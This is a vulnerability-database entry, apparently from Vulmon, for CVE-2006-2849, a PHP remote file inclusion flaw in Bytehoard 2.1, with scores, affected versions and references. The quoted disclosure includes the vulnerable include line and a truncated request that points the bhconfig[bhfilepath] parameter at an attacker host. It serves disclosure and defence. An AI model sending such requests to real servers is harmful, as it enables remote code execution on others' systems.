Published: 06/06/2006 Updated: 18/10/2018

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

PHP remote file inclusion vulnerability in includes/webdav/server.php in Bytehoard 2.1 Epsilon/Delta allows remote malicious users to execute arbitrary PHP code via a URL in the bhconfig[bhfilepath] parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
andrew godwin bytehoard 2.1_delta
andrew godwin bytehoard 2.1_epsilon

Script: Bytehoard 21 Epsilon/Delta wwwbytehoardorg Discovered: beford <xbefordx gmail com> File: /bytehoard/includes/webdav/serverphp Vuln: Remote File Include [code] require_once $bhconfig['bhfilepath']"/includes/webdav/_parse_propfindphp"; [/code] urlcom/bytehoard/includes/webdav/serverphp?bhconfig[bhfilepath]=attacker ...

A description of a Penetration Test project, including assessments from the Red and Blue team, and a final report.

Red Team and Blue Team Penetration Test and Reporting Project The tactics, techniques, methods and procedures in this repository were used during an authorized penetration test and were compiled into a written report This project was split into three phases to provide insight about how an attack may occur, how the incident response team analyzes the logs to discover the attack

NVD-CWE-Other http://secunia.com/advisories/20400 http://www.securityfocus.com/bid/18234 http://securitytracker.com/id?1016207 http://www.osvdb.org/25948 http://www.vupen.com/english/advisories/2006/2110 https://exchange.xforce.ibmcloud.com/vulnerabilities/26936 https://www.exploit-db.com/exploits/1860 http://www.securityfocus.com/archive/1/435728/100/0/threaded https://nvd.nist.gov https://github.com/Chris-Kelleher/Pentest_Project https://www.exploit-db.com/exploits/1860/

CVE-2006-2849

Vulnerability Summary

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect